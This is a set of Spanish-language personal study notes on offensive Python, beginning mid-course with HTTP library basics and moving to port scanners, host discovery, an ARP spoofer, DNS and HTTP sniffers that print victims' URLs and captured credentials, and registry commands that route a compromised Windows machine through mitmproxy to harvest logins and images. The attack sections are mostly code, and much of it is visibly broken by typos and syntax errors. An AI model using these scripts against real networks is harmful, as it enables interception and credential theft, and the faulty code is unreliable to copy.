response = requests.get("https://httpbin.org/cookies", cookies=cookies)
print(cookies)
print(response.text)
Enviar Archivo
import requests
url = "https://httpbin.org/post"
my_file = {'archivo': open('example.txt', 'r')}
response = requests.post(url, files=my_file)
print(response.text)
Mantener las cookies en el script
import requests
url = 'https://httpbin.org/cookies'
set_cookies = 'https://httpbin.org/cookies/set/my_cookie/123123'
response = requests.get(set_cookies_url)
response = requests.get(url)
print(response.text)
Las consultas por consola son diferentes de las del navegador, cuando se desea una relación en todas las solicitdues, hay que declarar una sesion.
import requests
url = 'https://httpbin.org/cookies'
set_cookies = 'https://httpbin.org/cookies/set/my_cookie/123123'
s = requests.Session()
response = s.get(set_cookies_url)
response = s.get(url)
print(response.text)
from requests import Request, Session
url = 'https://httpbin.org/get'
s = Session()
headers = {'Custom-Header': 'my_custom_header'}
req = Requests('GET', url, headers=headers) #Para alterar la solicitud sin modificar
prepped = req.prepare() # Cambiar valores antes de enviar
prepped.headers['Custom-Header'] = 'my_header_changed'
response = s.send(prepped)
print(response.text)
Para hacer un Log de redirecciones:
import requests
url = 'http://github.com'
r = requests.get(url, allow_redirects=False)
print(r.url) # Aplica redirect
print(r.history) # Ver historico
for request in r.history:
print(f"[+] Hemos pasado por el dominio {request.url} con un código de estado {request.status_code}")
r.url # Es la url final
Librería URLLIB
En esta clase hay otra librería que guarda vínculos y una relación con la librería requests y esta es URLLIB3 y tiene sus diferencias, la más significativa es la complejidad. Siendo requests más a alto nivel y urllib3 es más completa. Con urllib3 hay más opciones para manejar las excepciones.
import urllib3
import json
#Hay que definir un controlador de conexiones
http = urllib3.PoolManager() # Controlador
#Enviar una solicitud
response = http.request('GET', 'https://httpbin.org/get')
#Ver respuesta en bytes
print(response.data.decode())
#Enviar una solicitud POST
response = http.request('POST', 'https://httpbin.org/post')
#cuando se quiera enviar datos en bruto sin ser formulario, y para formulario
body =, fields=
data = "Esto es una prueba"
encoded_data = data.encode()
data2 = {'atributo': 'valor'}
encoded_data2 = json.dumps(data2).encode()
response = http.request('POST', 'https://httpbin.org/post', body=encoded_data)
response = http.request('POST', 'https://httpbin.org/post', body=encoded_data2)
response = http.request('POST', 'https://httpbin.org/post', fields={'atributo': 'valor'})
#Ver respuesta en bytes
print(response.data.decode())
# Lo conveniente al usar json es arrastrar una cabecera
data2 = {'atributo': 'valor'}
encoded_data2 = json.dumps(data2).encode()
response = http.request('POST', 'https://httpbin.org/post', body=encoded_data2, headers={'Content-Type': 'application/json'})
# Evitar redirect=False
response.status
print(dir(response))
response.get_redirect_location
#Ignorar certificados autofirmados
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http = urllib3.PoolManager(cert_reqs='CERT_NONE') # Controlador
Librería Threading y Multiprocessing
Los hilos nos permiten ejecutar múltiples tareas en paralelo dentro de un mismo proceso
import threading
import time
def tarea(num_tarea):
print(f"[+] Tarea {num_tarea} iniciando")
time.sleep(2)
print(f"[+] Tarea {num_tarea} finalizando")
tarea(1)
tarea(2)
# Tarea 2 debe esperar a que tarea 1 finalice para empezar. Si fueran multiples tareas como 50 tardará mucho. Ahí entrand los hilos
def tarea(num_tarea):
print(f"[+] HILO {num_tarea} iniciando")
time.sleep(2)
print(f"[+] HILO {num_tarea} finalizando")
thread1 = threading.Thread(target=tarea, args=(1,))
thread2 = threading.Thread(target=tarea, args=(2,))
#Esperear a que terminen los hilos con .join
thread1.start()
thread2.start()
thread1.join()
thread2.join()
Multiprocessing
Estos procesos no comparten memoria, entonces no comparte memoria pero puede usar múltiples núcleos de la cpu con son tareas intensivas.
import multiprocessing
import time
def tarea(num_tarea):
print(f"[+] HILO {num_tarea} iniciando")
time.sleep(2)
print(f"[+] HILO {num_tarea} finalizando")
proceso1 = multiprocessing.Process(target=tarea, args=(1,))
proceso2 = multiprocessing.Process(target=tarea, args=(2,))
#Esperear a que terminen los hilos con .join
proceso1.start()
proceso2.start()
proceso1.join()
proceso2.join()
Hay muchas herramientas que usan hilos para controlar el número de tareas. Gobuster, Wfuzz
Desarrollo de Aplicaciones de Escritorio
Interfaz gráfica de usuario
El ultimo apartado antes de entrar a la parte ofensiva, la idea es tratar de darle una interfaz de usuario a nuestros programas usando la librería Tkinter para el desarrollo de nuestras aplicaciones para el usuario. De manera muy sencilla pero gestionar todo más cómodo. Se harán algunos proyectos para repasar python y aplicar interfaz gráfica.
Tkinter - Desarrollo de aplicaciones
CustomTkinter - Desarrollo de aplicaciones
Chat Multiusuario con GUI y Cifrado E2E
Python Ofensivo
Previo a la explotación
De ser necesario se puede hacer la parte de OWAS TOP 10 del Curso de Hacking 1 para practicar aun más python ofensivo.
Installar termcolor y argparse.
Scripting - Escaner de Puertos
Para conocer la ip del router
arp -n
route -n
Versión 1.0
#!/usr/bin/env python3
import socket
host = '192.168.0.1'
port = 80
def port_scanner(host, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect((host, port)), está bien pero hay una variante connection_ex, la diferencia es que una retorna una excepción
# Para poner un tiempo de espera en el socket se hace lo siguiente
s.settimeout(1)
if s.connect_ex((host, port)): # Devuelve un valor código
print(f"[+] El puerto {port} esta cerrado")
else
print(f"[+] El puerto {port} esta abierto")
s.close()
def main():
port_scanner()
if __name__ == "__main__":
main()
Versión 2.0
#!/usr/bin/env python3
import socket
host = input("[+] Introduce una dirección IP: ")
port = int(input("[+] Introduce el puerto: "))
def port_scanner(host, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect((host, port)), está bien pero hay una variante connection_ex, la diferencia es que una retorna una excepción
# Para poner un tiempo de espera en el socket se hace lo siguiente
s.settimeout(1)
if s.connect_ex((host, port)): # Devuelve un valor código
print(f"[!] El puerto {port} esta cerrado")
else
print(f"[+] El puerto {port} esta abierto")
s.close()
def main():
port_scanner()
if __name__ == "__main__":
main()
Versión 3.0
#!/usr/bin/env python3
import socket
from termcolor import colored
host = input("[+] Introduce una dirección IP: ")
def create_socket():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
return s
def port_scanner(port, s):
try:
s.connect((host, port))
print(colored(f"[+] El puerto {port} está abierto", 'green'))
s.close()
except (socket.timeout, ConnectionRefusedError):
print(colored(f"[!] El puerto {port} está cerrado". 'red'))
# o también se puede hacer un pass y solo ver los abiertos y no los cerrados
pass
def main():
for port in range(1,1000):
s = create_socket()
port_scanner(port, s)
if __name__ == "__main__":
main()
Versión 4.0
#!/usr/bin/env python3
import socket
from termcolor import colored
import argparse
import sys
def get_arguments():
parser = argparse.argumentParser(description='Fast TCP Port Scanner')
parser.add_argument('-t', '--target', dest="target", help="Victim Target to Scan (Ex: -t 192.168.0.1)")
parser.add_argument('-p', '--port', dest="port", help="Port Range to Scan (Ex: -p 1-100)")
options = parser.parse_args()
if options.target is None or options.port is None:
parser.print_help()
sys.exit(1)
return options.target, options.port
def create_socket():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
return s
def port_scanner(port, host, s):
try:
s.connect((host, port))
print(colored(f"[+] El puerto {port} está abierto", 'green'))
s.close()
except (socket.timeout, ConnectionRefusedError):
print(colored(f"[!] El puerto {port} está cerrado". 'red'))
# o también se puede hacer un pass y solo ver los abiertos y no los cerrados
pass
def main():
target, port = get_arguments()
if '-' in port:
ports = port.split('-')
for port in range(int(ports[0]),int(ports[1]):
s = create_socket()
port_scanner(port, target, s)
elif ',' in port:
ports = port.split(',')
for port in ports:
s = create_socket()
port_scanner(int(port), target, s)
if __name__ == "__main__":
main()
Versión 4.1
#!/usr/bin/env python3
import socket
from termcolor import colored
import argparse
import sys
def get_arguments():
parser = argparse.argumentParser(description='Fast TCP Port Scanner')
parser.add_argument('-t', '--target', dest="target", help="Victim Target to Scan (Ex: -t 192.168.0.1)")
parser.add_argument('-p', '--port', dest="port", help="Port Range to Scan (Ex: -p 1-100)")
options = parser.parse_args()
if options.target is None or options.port is None:
parser.print_help()
sys.exit(1)
return options.target, options.port
def create_socket():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
return s
def port_scanner(port, host, s):
try:
s.connect((host, port))
print(colored(f"[+] El puerto {port} está abierto", 'green'))
s.close()
except (socket.timeout, ConnectionRefusedError):
print(colored(f"[!] El puerto {port} está cerrado". 'red'))
# o también se puede hacer un pass y solo ver los abiertos y no los cerrados
pass
def parse_ports(ports_str):
if '-' in ports_str:
start, end = map(int, ports_str.split('-'))
return ranger(start, end+1)
elif ',' in ports_str:
return map(int, ports_str.split(','))
else:
return (int(ports_str),)
def scan_ports(ports, target):
for port in ports:
s = create_socket()
port_scanner(port, target, s)
def main():
target, ports_str = get_arguments()
ports = parse_ports(ports_str)
scan_ports(ports, target)
if __name__ == "__main__":
main()
Versión 5.0
#!/usr/bin/env python3
import socket
from termcolor import colored
import argparse
import threading
def get_arguments():
parser = argparse.argumentParser(description='Fast TCP Port Scanner')
parser.add_argument('-t', '--target', dest="target", required=True, help="Victim Target to Scan (Ex: -t 192.168.0.1)")
parser.add_argument('-p', '--port', dest="port", required=True, help="Port Range to Scan (Ex: -p 1-100)")
options = parser.parse_args()
return options.target, options.port
def create_socket():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
return s
def port_scanner(port, host):
s = create_socket()
try:
s.connect((host, port))
print(colored(f"[+] El puerto {port} está abierto", 'green'))
s.close()
except (socket.timeout, ConnectionRefusedError):
print(colored(f"[!] El puerto {port} está cerrado". 'red'))
# o también se puede hacer un pass y solo ver los abiertos y no los cerrados
pass
def parse_ports(ports_str):
if '-' in ports_str:
start, end = map(int, ports_str.split('-'))
return ranger(start, end+1)
elif ',' in ports_str:
return map(int, ports_str.split(','))
else:
return (int(ports_str),)
def scan_ports(ports, target):
threads = []
for port in ports:
thread = threading.Thread(target=port_scanner(port, target))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
def main():
target, ports_str = get_arguments()
ports = parse_ports(ports_str)
scan_ports(ports, target)
if __name__ == "__main__":
main()
Hay un problema con los hilos porque estamos creando sockets por hilos de manera sin control y claro, son descriptores de archivo y al ser tantos empieza a colapsar. Por tanto, una solución es empleando un limite de creación de hilos entre 50-55-100 hilos en simultaneo. Y un manejador de señales. Versión 5.1
#!/usr/bin/env python3
import socket
from termcolor import colored
import argparse
from concurrent.futures import ThreadPoolExecutor
import signal
import sys
open_sockets = []
def def_handler(sig, frame):
print(colored(f"[!] Saliendo del programa...", 'red'))
for socket in open_sockets:
socket.close()
sys.exit(1)
signal.signal(signal.SIGINT, def handler) # Ctrl + C
def get_arguments():
parser = argparse.argumentParser(description='Fast TCP Port Scanner')
parser.add_argument('-t', '--target', dest="target", required=True, help="Victim Target to Scan (Ex: -t 192.168.0.1)")
parser.add_argument('-p', '--port', dest="port", required=True, help="Port Range to Scan (Ex: -p 1-100)")
options = parser.parse_args()
return options.target, options.port
def create_socket():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
open_sockets.append(s)
return s
def port_scanner(port, host):
s = create_socket()
try:
s.connect((host, port))
s.sendall(b'HEAD / HTTP/1.0\r\n\r\n')
response = s.recv(1024)
response = response.decode(errors='ignore').slipt('\n')[0]
if response:
print(colored(f"[+] El puerto {port} está abierto - {response}", 'green'))
else:
print(colored(f"[+] El puerto {port} está abierto", 'green'))
except (socket.timeout, ConnectionRefusedError):
pass
finally:
s.close()
def parse_ports(ports_str):
if '-' in ports_str:
start, end = map(int, ports_str.split('-'))
return ranger(start, end+1)
elif ',' in ports_str:
return map(int, ports_str.split(','))
else:
return (int(ports_str),)
def scan_ports(ports, target):
with ThreadPoolExecutor(max_workers=50) as executor:
executor.map(lambda port: port_scanner(port, target), ports)
def main():
target, ports_str = get_arguments()
ports = parse_ports(ports_str)
scan_ports(ports, target)
if __name__ == "__main__":
main()
Scripting - Macchanger
Una herramienta para cambiar la dirección mac de la interfaz de red que proporcionemos.
#!/usr/bin/env python3
import arhparse
import re
import subprocess
from termcolor import colored
def get_arguments():
parser = argparse.ArgumentParser(description="Herramienta para cambiar la dirección MAC de una interfaz de red")
parser.add_argument("-i", "--interface", required=True, dest="interface", help="Nombre de la interfaz de red")
parser.add_argument("-m", "--mac", required=True, dest="mac_address", help="Nueva dirección MAC para la interfaz de red")
return parser.parse_args()
def is_valid_input(interface, mac_address):
is_valid_interface = re.match(r'^[e][n|t][s|t|p]\d{1,2}[s]\d{1,2}$', interface)
is_valid_mac_address = re.match(r'^([A-Fa-f0-9]{2}[:]){5}[A-Fa-f0-9]{2}$', mac_address)
return is_valid_interface and is_valid_mac_address
def change_mac_address(interface, mac_address):
if is_valid_input(interface, mac_address):
print(f"[+] Los datos son correctos")
subprocess.run(["ifconfig", interface, "down"])
subprocess.run(["ifconfig", interface, "hw", "ether", mac_address])
subprocess.run(["ifconfig", interface, "up"])
print(colored(f"[+] La MAC se ha cambiado exitosamente", 'green'))
else:
print(colored(f"[!] Los datos no son correctos", 'red'))
def main():
args = get_arguments()
change_mac_address(args.interface, args.mac_address)
if __name__ == "__main__":
main()
Scripting - Escaner de red ICMP
El objetivo es determinar todos los equipos conectados en la misma red que nosotros.
#!/usr/bin/env python3
import argparse
import subprocess
import signal
import sys
from concurrent.futures import ThreadPoolExecutor
def def_handler(sig, frame):
print(f"[!] Saliento del programa...")
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
def get_arguments():
parser = argparse.ArgumentParser(description="Herramienta para descubrir Host activos en una red ICMP")
parser.add_argument("-t", "--target", required=True, dest="target", help="Host o rango de red a escanear")
args = parser.parse_args()
return args.target
def parse_target(target_Str):
target_str_splitted = target_str.split('.')
first_three_octets = '.'.join(target_str_splitted[:3])
if len(target_str_splitted) == 4:
if '-' in target_str_splitted[3]:
start, end = target_str_splitted[3].split('-')
return [f"{first_three_octets}.{i}" for i in range(int(start), int(end+1))]
else:
return [target_str]
else:
print(f"[!] El formato de IP no es el correcto")
def host_target(target):
try:
ping = subprocess.run(["ping", "-c", "1", target], timeout=1, stdout=subprocess.DEVNULL)
if ping.returncode == 0:
print(f"[+] La IP {target} está activa")
except subprocess.TimeoutExpired:
pass
def main():
target_str = get_arguments()
targets = parse_target(target_str)
print(f"[+] Host activos en la red:\n")
with ThreadPoolExecutor(max_workers=50) as executor:
executor.map(host_discovery, targets)
if __name__ == '__main__':
main()
Scripting - Escaner de red ARP con Scapy
La anterior herramienta funcionaba mediante ICMP, pero existen otras alternativas por ejemplo protocolo ARP address resolution protocol.
En una escuela, ¿Quién es John Doe? cuya IP es la (192.168.1.65). Y hay una gran cantidad de alumnos y gritamos a los 4 vientos, ¿Oye, quién es John Doe cuya IP es la 192.168.1.65?. Este mensaje le llega a todos los alumnos y John Doe nos responde con su XX:XX:XX:XX:XX:XX Dirección MAC.
Mapear con una Dirección IP la dirección MAC dada. Esto se hará utilizando Scapy.
#!/usr/bin/env python3
import argparse
import signal
import sys
import scapy.all as scapy
def def_handler(sig, frame):
print(f"[!] Saliendo del programa...")
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
def get_arguments():
parser = parser.ArgumentParser(description="ARP Scanner")
parser.add_argument("-t", "--target", required=True, dest="target", help="Host / IP range to scan")
args = parser.parse_args()
return args.target
def scan(ip):
#La forma más fácil es usando .arping
scapy.arping(ip)
#La forma chetada es construir el paquete para tener control
arp_packet = scapy.ARP(pdst=ip) # Ya estaría el paquete arp construido, sigue la trama Ethernet
broadcast_packet = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_packet = broadcast_packet/arp_packet #Operador de composición para unir capas de red
answered, unanswered = scapy.srp(arp_packet, timeout=1, verbose=False)
response = answered.summary()
if response:
print(response)
def main():
target = get_arguments()
scan(target)
if __name__ == "__name__":
main()
Scripting - ARP Spoofer con Scapy
Se pierde mucho control al usar herramientas como Script Kiddie, entonces para el envenenamiento ARP se hace un ataque de MITM un ATAQUE de el hombre en el medio.
Básicamente permite interceptar el trafico generado por un host.
Hay que realizar 2 respuestas, la primera que se envía es al router con la dirección IP de la máquina pero, con mi MAC de atacante. La segunda respuesta es a la máquina windows con la IP del router pero, con mi dirección MAC. La cache de ambos dispositivos esta siendo alterada haciéndole creer que la MAC vinculada es la nuestra. Conseguimos de todo. ARP no tiene autenticación y por eso es inevitable este ataque.
A partir de esta clase se basan las siguientes con ARP.
Hay que configurar unas reglas IP tables.
iptables —policy FORWARD ACCEPT
Esto permitirá aceptar paquetes entrantes y luego redirigirlos de vuelta al destino. Luego hay que realizar en la terminal:
cat /proc/sys/net/ipv4/ip_forward
1
Debe tener un 1 para poder comunicarlos de vuelta al destino.
Script
#!/usr/bin/env python3
import argparse
import sys
import signal
import scapy.all as scapy
import time
def def_handler(sig, frame):
print(f”[!] Saliendo del programa...”)
sys.exit(1)
signal.signal(signal.SIGINT, del_handler)
def get_arguments():
parser = arparse.ArgumentParser(description=“ARP Spoofer”)
parser.add_argument(“-t”, “--target”, required=True, dest=“ip_address”, help=“Host o IP range to spoof”)
return parser.parse_args()
def spoof(ip_address, spoof_ip):
arp_packet = scapy.ARP(op=2, psrc=spoof_ip, pdst=ip_address, hwsrc=“aa:bb:cc:44:55:66”)
scapy.send(arp_packet, verbose=False)
def main():
arguments = get_arguments()
while True:
spoof(arguments.ip_address, “192.168.1.1”)
spoof(“192.168.1.1”, arguments.ip_address)
time.sleep(2)
if __name__ == “__main__”:
main()
Dar de baja la interfaz de red
ifconfig enp3s0 down
macchanger --mac=“aa:bb:cc:44:55:66” enp3s0
ifconfig enp3s0 up
macchanger -s enp3s0
Scripting - DNS Sniffer
Después de hacer un envenenamiento ARP, ya prácticamente como tenemos un gran control, se debe saber filtrar y manipular paquetes para poder llevar a cabo nuestras tareas. Para este caso un sniffer DNS. Debido a que DNS trabaja por UDP y en el puerto 53.
#!/usr/bin/env python3
import signal
import sys
import scapy.all as scapy
def def_handler(sig, frame):
print(f”[!] Saliendo...”)
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
def process_dns_packet(packet):
#print(packet.show())
if packet.haslayer(scapy.DNSQR):
print(packet.show())
domain = packet[scapy.DNSQR].qname.decode()
exclude_keywords = [”google”, “cloud”, “bing”, “static”]
if any(keyword in domain for keyword in exclude_keywords):
print(f”[+] Dominio: {domain}”)
def main():
global domains_seen
domains_seen = set()
interface = “enp3s0”
scapy.sniff(iface=interface, filter=“udp and port 53”, prn=process_dns_packet, store=0)
if __name__ == “__main__”:
main()
Scripting - HTTP Sniffer
Al lanzar el envenenamiento ARP sniffer en paralelo con el DNS Sniffer podíamos ver los dominios que la máquina consulta a nivel de navegación. Para poder ver datos y ser más intrusivos. Hay que hacer una distinción porque el three way handshake viaja en texto plano, distinto es un panel de autenticación. Página para practicar es testphp.vulnweb.com/login.php
#!/usr/bin/env python3
import scapy.all as scapy
from scapy.layers import http
import signal
import sys
def def_handler(sig, frame):
print(f"[!] Saliendo...")
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
def process_packet(packet):
cred_keywords = ["login", "user", "pass"]
if packet.haslayer(http.HTTPRequest):
url = "http://" + packet[http.HTTPRequest].Host.decode() + packet[http.HTTPRequest].Path.decode()
print("[!] URL Visitada por la victima: {url}")
if packet.haslayer(scapy.Raw):
try:
res = packet[scapy.Raw].load.decode()
for keyword in cred_keywords:
if keyword in res:
print(f"[+] Posibles credenciales: {res}")
break
except:
pass
def sniff(interface):
scapy.sniff(iface=interface, prn=process_packet, storage=0)
def main():
sniff("enp3s0")
if __name__ == "__main__":
main()
Ya no hace falta el envenenamiento ARP, para el DNS o para el HTTP si podemos seguir usándolo. Pero ahora vamos a emplear un proxy y atacar con Man in the Middle. Y ya luego nosotros nos encargamos de las consultas.
¿Qué es un proxy?: Es un equipo que hace de intermediario entre un cliente y un servidor filtrando paquetes. MITM proxy es una herramienta para levantar un server proxy.
Todo esta cifrado, pero instalaremos un certificado de MITM para poder descifrar todo el trafico https://mitmproxy.org/. Y nos genera 3 binarios que vamos a utilizar. Dar por hecho que hemos vulnerado la máquina windows y como nt-authority system podríamos settear el proxy desde consola, pero el certificado es algo más complicado.
Nos iremos a la página mitm.it veremos un mensaje diciendo if you can see this, traffic is not passing through mitmproxy.
Para hacerlo hay que ejecutar ./mitmweb y lo que hace es crear como un servidor en escucha en el equipo local.
Al haber vulnerado la máquina en los ajustes de windows hay que escribir configuración de proxy y nos iremos a configuración manual. Pondremos nuestra dirección ip y el puerto 8080. Y en la página ya tendremos para instalar el certificado.
Desde consola se abre el regedit y aplicar el cambio de habilitar el proxy.
HKEY_CURRENT_USER SOFTWARE MICROSOFT WINDOWS CURRENT_VERSION INTERNET SETTINGS
y el valor de proxy enable y si vale 0 esta desactivada Shell como administrador
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /t REG_SZ /d "192.168.0.40:8080" /f
Ahora todo el equipo a nivel de comunicación de trafico pasará a nuestra máquina de atacante. Ahora falta que la máquina pueda navegar sin problema. Ejecutamos el ./mitmproxy. Hay que instalar el certificado en Entidades de certificación de confianza.
Pero la gracia es hacer scripting con mitmdump
#!/usr/bin/env python3
from mitmproxy import http
from mitmproxy import ctx
def request(packet):
ctx.log.info(f"[+] URL: {packet.request.url}")
def response(packet):
ctx.log.info(f"[+] RESPONSE: {packet.request.url}")
Ejecutar ./mitmdump -s http_sniffer.py –quiet
#!/usr/bin/env python3
from mitmproxy import http
from urllib.parse import urlparse
def has_keywords(data, keywords):
return any(keyword in data for keyword in keywords)
def request(packet):
url = packet.request.url
parsed_url = urlparse(url)
scheme = parsed_url.scheme
domain = parsed_url.netloc
path = parsed_url.path
print(f"[+] URL visitada por la victima: {scheme}://{domain}{path}")
keywords = ["user", "pass"]
data = packet.request.get_text()
if has_keywords(data, keywords):
print(f"[+] Posibles credenciales capturadas: {data}")
Scripting - HTTPS_Image Sniffer con mitmdump
En este punto se ha sniffeado un poco de todo desde ARP a https. Pero también se puede sniffear imagenes
El content-type es un recurso en las cabeceras para saber que tipo de archivo se transmite
mitmdump -s image_sniffer.py –quiet
from mitmproxy import http
def response(packet):
content_type = packet.response.headers.get("content-type", "")
try:
if "image" in content_type:
url = packet.request.url
extension = content_type.split("/")[-1]
if extension == "jpeg":
extension = "jpg"
file_name = f"images/{url.replace('/', '_').replace(':', '_')}.{extension}"
image_data = packet.response.content
with open(file_name, "wb") as f:
f.write(image_data)
print(f"[+] Imagen guardada: {file_name}")
except:
pass
Scripting - DNS Spoofer con Scapy y NetfilterQueue
Scripting - Traffic Hijacking
Scripting - Keylogger
Scripting - Creación de Malware
Scripting - Creación de Backdoors y Command_and_Control
Scripting - Forward Shell
Esta publicación ha sido creada como soporte en mi formación académica y crecimiento profesional.
© Juan David Garcia Acevedo (aka liandd)